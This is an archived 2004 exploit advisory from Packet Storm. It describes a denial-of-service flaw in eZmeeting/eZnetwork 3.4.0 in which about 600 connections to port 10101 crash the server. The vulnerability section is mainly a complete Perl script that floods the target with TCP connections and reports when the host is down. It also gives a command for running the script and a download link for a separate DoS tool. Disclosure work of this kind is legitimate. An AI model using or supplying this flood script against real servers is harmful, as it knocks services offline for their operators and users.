what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ez.txt

ez.txt
Posted Sep 9, 2004
Authored by Dr. Insane

Opening up more than 600 connections to Ezmeeting versions 3.4.0 causes the application to crash.

tags | exploit
SHA-256 | 8d02261244cd0b5b551e2dd67611dc663d9b71ffd4e54f331ea6687ebd5f8f5f

ez.txt

Change Mirror Download

Security Advisory



Vulnerability: Eznetwork multiple connections Denial of service
Packages : "eZ34.exe" and "eZphoto1.2.1.EXE"
+ eZ
+ eZphotoshare
+ eZmeeting
+ eZnetwork
+ eZshare
Software : www.eZmeeting.com
[version 3.4.0]
eZnet Modules:
SwServer: 1.153
SwEzModule.dll: 1.72
SwLoginModule.dll: 1.94
SwMetaObjectModule.dll: 1.46
SwProxyModule.dll: 1.35
SwShareModule.dll: 1.90
SwStatusModule.dll: 1.41
SwTransferModule.dll: 1.172

Version : 3.4.0 and prior
Vendor : eZnetwork
Vendor Url : http://www.ezmeeting.com/Products.html
Bug Type : Denial of service attack
Severity : Medium--->remote crash
Severity : medium
Author: dr_insane , dr_insane@pathfinder.gr


#################################################

#################################################

1. Description

eZ:
---
"Imagine going to the movies, but instead of seeing the picture, someone had to
describe it to you verbally. That's what's happening in countless business
discussions and conference calls every day. A lot of time and money is being
wasted. That's why we created eZ. Now imagine having the ability to
place any document right in front of the person you’re speaking with on the
phone, immediately - Word, Excel, PowerPoint, PDF, CAD, Digital Photos. Online.
Real time. That's the power of eZ. Regardless of the distance that separates
your team, eZ delivers an amazingly interactive, simple, visual workspace for
all team players. If a picture paints a thousand words, think what an
interactive picture can do for your business. Picture it with eZ."
- Vendor's Description

eZnetwork:
----------
"eZnetwork is a service that works hand in hand with the eZ desktop application.
It allows users to connect with others (outside their Local Area Network) over
the Internet, by using an eZ identity, or 'Friendly Name'. eZnetwork also allows
users to host conferences and join conferences, even when one or more
participants are located behind corporate firewalls, without compromising
security."
- Vendor's Description

eZphotoshare:
-------------
"eZphotoshare is an amazing new way to share Digital Photos over the Internet
with friends and family. Seeing is believing, download it today and
interactively share digital photos anytime, anywhere. It's FREE for home use."
- Vendor's Description


2. Vulnerability Details
The vulnerability is caused due to an error in the connection handling, which can be exploited to crash the
server by establishing about 600 connections to 10101 port.

By executing the following code against Ez.exe (port 10101) the server will crash:

-----------------------------------------------------------------

"C:\Perl\bin\perl5.6.1.exe "C:\kill_ez.pl" 127.0.0.1 10101 600" |

-----------------------------------------------------------------

#!/usr/bin/perl

use Strict;
use Socket;
use IO::Socket;

my $host = $ARGV[0];
my $port = $ARGV[1];
my $stop = $ARGV[2];
my $size = 1000;
my $prot = getprotobyname('tcp');
my $slep = $ARGV[3];

printf("================================================\n");
printf(" Eznetwork POC \n");
printf("================================================\n");
printf("[*] Making %d Connections To %s \n", $stop , $host);

for ($i=1; $i<$stop; $i++)
{
socket($i, PF_INET, SOCK_STREAM, $prot );
my $dest = sockaddr_in ($port, inet_aton($host));
connect($i, $dest);
}

CheckServer($host, $i, $slep, $stop);
KillThreads($stop);
printf("[*] Exploit Attempt Unsuccesful");
exit;

sub CheckServer($host, $i, $slep, $stop) {
($host, $i, $slep, $stop) = @_;
$blank = "\015\012" x 2;
$request = "GET / HTTP/1.0".$blank;
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
Timeout => '10000',
Type => SOCK_STREAM,
);
print $remote $request;
unless ( <$remote> )
{
printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);
printf("[*] The Host Will Be Down For %d Seconds\n", $slep);
sleep($slep);
KillThreads($stop);
exit;
}
}

sub KillThreads($stop) {
$stop = @_;
printf("[*] Killing All active Connections");
for ($l=1; $l<$stop; $l++) {
shutdown($l,2)|| die("Couldn't Shut Down Socket");
$l++;
}
}


If you don't want to use this code you can download g0dzilla to test it:
http://members.lycos.co.uk/r34ct/main/godzillaDosTool/upgrade_to_v02.exe


Workaround:
User another product

Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close